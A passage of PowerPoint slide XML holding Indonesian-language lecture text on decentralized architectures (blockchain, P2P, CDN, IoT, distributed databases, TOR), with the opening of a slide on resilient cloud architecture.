              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>situasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Blockchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdistribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> peer-to-peer (P2P)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node-node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpartisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih-alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (CDN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Internet of Things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terdistribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>TOR (The Onion Router)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelajahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anonim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. TOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sukarela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394190678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Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Tangguh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
